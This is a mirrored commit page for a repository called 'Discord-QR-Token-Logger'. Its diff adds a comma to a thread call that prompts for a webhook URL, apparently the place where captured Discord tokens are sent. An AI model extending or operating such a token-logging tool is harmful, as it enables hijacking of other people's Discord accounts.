mirror of
https://github.com/9P9/Discord-QR-Token-Logger.git
synced 2025-04-19 22:53:46 +00:00
Update main.py
This commit is contained in:
parent
1091fc7988
commit
2908e6c75a
@ -193,7 +193,7 @@ if __name__ == "__main__":
|
||||
args=(
|
||||
Write.Input("\n[*] Enter your webhook url -> ",
|
||||
Colors.green_to_cyan,
|
||||
interval=0.01)
|
||||
interval=0.01),
|
||||
))
|
||||
elif (confir == NO) or (confir == NO.upper()):
|
||||
th_main = Thread(target=main, args=(None,))
|
||||
|
Loading…
x
Reference in New Issue
Block a user